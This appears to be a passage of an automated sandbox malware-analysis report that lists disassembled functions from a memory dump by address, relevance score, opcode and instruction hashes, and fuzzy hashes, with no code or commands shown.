                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                    • API String ID: 0-702105204
                                                                                                                    • Opcode ID: 383d6c199d1e5679988b7eca717b2b332dcde979b3a64b85b0c41eac49108394
                                                                                                                    • Instruction ID: 02d07f92a64054cefe9051698f6ac9b79fd31feae3761f0c4f40c952da8faa7a
                                                                                                                    • Opcode Fuzzy Hash: 383d6c199d1e5679988b7eca717b2b332dcde979b3a64b85b0c41eac49108394
                                                                                                                    • Instruction Fuzzy Hash: B601263A300302ABE6216B5AEC8CE6B7FE5EFC1668F08002DF6458B551CB34AD41C793
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A92000 Relevance: .8, Instructions: 757COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9afb1d3b922b2f4e215223290096ac3857d1869fc347c23090ff187cc5c265c0
                                                                                                                    • Instruction ID: ef74a64a025df6376c5fd32dc29550ee8e9a80be2a1fdacdd7c4854df0ddad30
                                                                                                                    • Opcode Fuzzy Hash: 9afb1d3b922b2f4e215223290096ac3857d1869fc347c23090ff187cc5c265c0
                                                                                                                    • Instruction Fuzzy Hash: 6842B575608341ABDF26CF68C990B6FBBE5AFC8300F18492EFA8597250D771D885CB52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A88158 Relevance: .6, Instructions: 617COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9a39c7efedd643d103598b91b5ffa75bfb35c14539eccebcf3759ace7c14b010
                                                                                                                    • Instruction ID: 24080dbe4f8fd988860150c02762c2da0633a09a87ed072affc95ae5fb61bf71
                                                                                                                    • Opcode Fuzzy Hash: 9a39c7efedd643d103598b91b5ffa75bfb35c14539eccebcf3759ace7c14b010
                                                                                                                    • Instruction Fuzzy Hash: 62426F75E102198FEB25DF69C841BADBBF5BF48300F588099E949EB242DB389D85CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A02840 Relevance: .6, Instructions: 605COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2a2137bd8a5025c80b403850f9fe5afd7ea6a17284907dac0084a9fe014ade6e
                                                                                                                    • Instruction ID: 61bf8f03f418825ff939abccf193e83df9d57269b7ac4d40b5a1252a5ffedad5
                                                                                                                    • Opcode Fuzzy Hash: 2a2137bd8a5025c80b403850f9fe5afd7ea6a17284907dac0084a9fe014ade6e
                                                                                                                    • Instruction Fuzzy Hash: DE323170A087558FEB66CF69C9447BEBBF2BF84304F54411ED88A9B685D734A802CF50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A9A118 Relevance: .6, Instructions: 591COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3a01abe8b6d2b88053ac630f8e4cacf8fce925ef2d6946a346760328134bbc14
                                                                                                                    • Instruction ID: 49f62c17dae1bf1b978e4c532c215e5caaaf12afa99827879fe37a2bf54d03c8
                                                                                                                    • Opcode Fuzzy Hash: 3a01abe8b6d2b88053ac630f8e4cacf8fce925ef2d6946a346760328134bbc14
                                                                                                                    • Instruction Fuzzy Hash: 16229D742046618BEF25CF2DC095376BBF1AF85304F18849BDA968F286E735E4D2DB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F6A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cca624635e30dd00405854e993111125fb30253a413c2f2373babc1d9dbbd821
                                                                                                                    • Instruction ID: 047bc2fa46280e66e695ceec44ef19dbcd98f257a1c45f460626ac7428c922ab
                                                                                                                    • Opcode Fuzzy Hash: cca624635e30dd00405854e993111125fb30253a413c2f2373babc1d9dbbd821
                                                                                                                    • Instruction Fuzzy Hash: F8327A71A04305DFDB65CF68C980BAABBF5FF48310F14896DEA59AB292D734E841CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A14A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                    • Instruction ID: dfb46a76c454fdc5fe00ac6d8c41113d7fea0a9bcf774ff03591dd78fad2f413
                                                                                                                    • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                    • Instruction Fuzzy Hash: 37F15B75E0421A9BDF15CFA9D590BAEBBF6BF48710F088129E905AB348E774D841CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A8892B Relevance: .4, Instructions: 386COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fce9f9f1e699ac174b28f6b3548f76df4b25281888aab6610f2371a21b7c308a
                                                                                                                    • Instruction ID: 17f17a4b5b959ee750c2de136efbcf5588b08a9928707d6639188ad2fe7f59c0
                                                                                                                    • Opcode Fuzzy Hash: fce9f9f1e699ac174b28f6b3548f76df4b25281888aab6610f2371a21b7c308a
                                                                                                                    • Instruction Fuzzy Hash: 15D1F171E0060A8BDF15DFA8C841ABEB7F1BF88304F598169D955E7281EB3DE905CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F65D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fe4862062d851bebbe397c0b3a2b2ff3dfc0dc1f677d07e02ac5a9addae638e0
                                                                                                                    • Instruction ID: 918208c2b7a0b29f770dd60c73043e695d88e1b06524989144a16bae5bdcc6fa
                                                                                                                    • Opcode Fuzzy Hash: fe4862062d851bebbe397c0b3a2b2ff3dfc0dc1f677d07e02ac5a9addae638e0
                                                                                                                    • Instruction Fuzzy Hash: 0EE19E71608342DFC715CF28C190A6ABBF4FF89314F058A6DEA9987351EB31E945CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019E8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fa5586b7f15f378c2e775b78b2a19dcbb75c21e1008054076d0d7728c003b7b1
                                                                                                                    • Instruction ID: 2105948b9c4a741b95509f5dc1da933a7a62a7482c6bf55671ea120035d753a1
                                                                                                                    • Opcode Fuzzy Hash: fa5586b7f15f378c2e775b78b2a19dcbb75c21e1008054076d0d7728c003b7b1
                                                                                                                    • Instruction Fuzzy Hash: 33D1E471A00606DBDB16DFA8C884EBAB7E5FF94704F05462DE91ADB280EB34D951CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A78243 Relevance: .3, Instructions: 322COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                    • Instruction ID: b276e365299d6a627cf90b7373c3e2cc09f1af2cf248d8a908ab1dca48eeccff
                                                                                                                    • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                    • Instruction Fuzzy Hash: EDB1A275A00705AFDF24DF99CD48EABBBB9FF84304F14442DAA1297794DA38EA05CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A00535 Relevance: .3, Instructions: 300COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                    • Instruction ID: b75e449da9b905eb4207c7cc2491a00d49dad8b570e159eb3393313ddc9df086
                                                                                                                    • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                    • Instruction Fuzzy Hash: 58B14B31604646AFDB26CB68CA50BBEBBF6AF88340F184159E952D73C1EB30ED41CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019F83C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 82de90ea4c3650148e9f690a302f3c7deebf9eca9f5cd540d5610bf44f5f3be6
                                                                                                                    • Instruction ID: d4e15a73004ceb180b0048bc8d56f8e5b5a3e469507ce62910a3bf7a42fe6235
                                                                                                                    • Opcode Fuzzy Hash: 82de90ea4c3650148e9f690a302f3c7deebf9eca9f5cd540d5610bf44f5f3be6
                                                                                                                    • Instruction Fuzzy Hash: CCC16874208341DFD7A4CF19C484BABB7E5BF88704F44496DEA898B291E774E908CF92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 019EC427 Relevance: .3, Instructions: 280COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1890590f51248a5365d22927177444a5f10b5b987e061d4364e21de310dbba2b
                                                                                                                    • Instruction ID: 6bc09754967e23c44a13f8d02abb82fb13b885b8ba25e26ef2206998f248ee76
                                                                                                                    • Opcode Fuzzy Hash: 1890590f51248a5365d22927177444a5f10b5b987e061d4364e21de310dbba2b
                                                                                                                    • Instruction Fuzzy Hash: A6B17070A042668BDB35CF68C884BAAB7F5EF84710F0485E9D54EEB241EB309D85CF21
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A1E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 24136d979b2dcf7f99d529f880c23f70d42b0b9899d11675b8c053ccaf13ee00
                                                                                                                    • Instruction ID: 0fa9bc0a77d547b824d78f25164f31ebaa1066accbc836e5999c1ff1e229c97b
                                                                                                                    • Opcode Fuzzy Hash: 24136d979b2dcf7f99d529f880c23f70d42b0b9899d11675b8c053ccaf13ee00
                                                                                                                    • Instruction Fuzzy Hash: E9A12331E04659AFEB22DBA8C948FAEBBB4AF04714F090525EE10AB2D5D7749D40CBD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A30185 Relevance: .3, Instructions: 276COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ed5e54a1364a347d04e4f3717ec7cccca0285f62d0826471ec3bfe8483665bf5
                                                                                                                    • Instruction ID: 4e807fd6d8dd3bbfd4974cbe0b14331082c99e708a28123c95077d50cb8b2ba3
                                                                                                                    • Opcode Fuzzy Hash: ed5e54a1364a347d04e4f3717ec7cccca0285f62d0826471ec3bfe8483665bf5
                                                                                                                    • Instruction Fuzzy Hash: 46A1B174B007169FDB25DF69CA90BAAB7B9FF94314F044029FA45D7282DB34E912CB90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01AC4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d414c9a0c0d95a0fdcb91b5f05f59508913f551311f28f45a2fcd5b530dcd57e
                                                                                                                    • Instruction ID: 32ee3f7e4b048de0b2238bb7951eec0950afe87cfb71486e27d22228621d3b04
                                                                                                                    • Opcode Fuzzy Hash: d414c9a0c0d95a0fdcb91b5f05f59508913f551311f28f45a2fcd5b530dcd57e
                                                                                                                    • Instruction Fuzzy Hash: 1CA1CE72A04612EFD712DF28C990B6ABBE9FF58B04F05092DF5899B651D334EC01CB95
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A760E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7393bf5a7c50955440527f92ca2a8cf956424acfe6794e3867452338a1a06668
                                                                                                                    • Instruction ID: c6cd4cef95e539ad6a2a31260ef43a7801f65227e161433ed6f477146ec90e9f
                                                                                                                    • Opcode Fuzzy Hash: 7393bf5a7c50955440527f92ca2a8cf956424acfe6794e3867452338a1a06668
                                                                                                                    • Instruction Fuzzy Hash: 41919171D00616AFEB15CFA9DC84BBEBBB5AF48710F154169E618EB341D734DA00CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A0E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9f1719723775a9eb88a877d808308ba4cafee84f3f651ca351660e0b33c3d4f6
                                                                                                                    • Instruction ID: 554a864049b06e88c773c96fa09fbb5a47258527903549b0a565cd36ace82b36
                                                                                                                    • Opcode Fuzzy Hash: 9f1719723775a9eb88a877d808308ba4cafee84f3f651ca351660e0b33c3d4f6
                                                                                                                    • Instruction Fuzzy Hash: 91914631A00212CBEB26DB68E544B7EBBB1EF94714F094869ED05DF3C1E636E901DB51
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A46ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f62075db20abb9cd04d3394739f6ecbd6c4c0ddc9087d55f0a483194cebe5e53
                                                                                                                    • Instruction ID: edf14bbc626398ae8839c43aeed2d7c3e86ec7ecc32adce592a8d12ca92332bc
                                                                                                                    • Opcode Fuzzy Hash: f62075db20abb9cd04d3394739f6ecbd6c4c0ddc9087d55f0a483194cebe5e53
                                                                                                                    • Instruction Fuzzy Hash: A18194B1E006169FDB18CF69D940ABEBBF9FB89700F14852EE449D7640E334D941CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01ABAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                    • Instruction ID: 6a18b1d10a7cbed8218a9faf0bc91305ee362b33d28277fe9316386d9eaa83ab
                                                                                                                    • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                    • Instruction Fuzzy Hash: A0817071A002899FDF19CF99C5C0AEEBBBAFF84310F188569D9169B346D734E905CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A2E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2f3c97db93f6ed8c1b208368a7d7f060dd24e1a4342dff3b50a103b8f52f38ca
                                                                                                                    • Instruction ID: bd8d19c4c1588c963fe6020cf0aa1aef2ff5b85cc54cee1010c5bf73f21feedd
                                                                                                                    • Opcode Fuzzy Hash: 2f3c97db93f6ed8c1b208368a7d7f060dd24e1a4342dff3b50a103b8f52f38ca
                                                                                                                    • Instruction Fuzzy Hash: 8A813B71A00619EFDB25CFA9C980BEEBBFAFF88354F144429E556A7250D730AC45CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A0C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 977d804348d82fdebce9cac2de3e7bd3ca6d58f8b745752396d523ddbd5100e2
                                                                                                                    • Instruction ID: d865e687aef94aabb9862f1147d02a4a093b2cb8d268d40e6686613fdc688ead
                                                                                                                    • Opcode Fuzzy Hash: 977d804348d82fdebce9cac2de3e7bd3ca6d58f8b745752396d523ddbd5100e2
                                                                                                                    • Instruction Fuzzy Hash: 7671F2B5D04225DBCB26CF59D8907BEBBF5FF58720F14425AE842AB394D3389805CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01AA47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 4695a62e75ccf9790dfb2180a0ad5f8a382a2d22183acb3143b54ef118c9149d
                                                                                                                    • Instruction ID: d50ee14831cafed7a08ba87926278f21f6820b2a17f61b95f41157e8c4c3f264
                                                                                                                    • Opcode Fuzzy Hash: 4695a62e75ccf9790dfb2180a0ad5f8a382a2d22183acb3143b54ef118c9149d
                                                                                                                    • Instruction Fuzzy Hash: 3B71D8B4900205EFDB20CF59DA94E9ABBF4FFA8310F88455EF608DB258C7729945CB54
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A0260B Relevance: .2, Instructions: 201COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b5df6f531827bd8391a7493f125442398e753dfabe7a99566b9ee79fa73e227d
                                                                                                                    • Instruction ID: ee69b862be81af5714ec6b435701609963f29064b30d5af657dd1362433a72d6
                                                                                                                    • Opcode Fuzzy Hash: b5df6f531827bd8391a7493f125442398e753dfabe7a99566b9ee79fa73e227d
                                                                                                                    • Instruction Fuzzy Hash: C471B1356047429FD316DF28D888B6AB7E5FF84310F0985AAE899CB392DB34D845CB91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A7035C Relevance: .2, Instructions: 198COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                    • Instruction ID: d9b3b85ac484a3bde1546878743a284fc62fc77964e6f0cf640b60f0650d7aa7
                                                                                                                    • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                                                    • Instruction Fuzzy Hash: 58716F71A00619EFDB11DFA9DA84EEEBBB8FF48710F104569E505EB290DB34EA05CB50
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 01A862A0 Relevance: .2, Instructions: 198COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1432136782.00000000019C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019C0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_19c0000_duGqHKp0OUXaX1D.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d8eba5ddc68a8b7d83553ef58bbd58df50d9b377f72bb929ef518446ce4c2afe
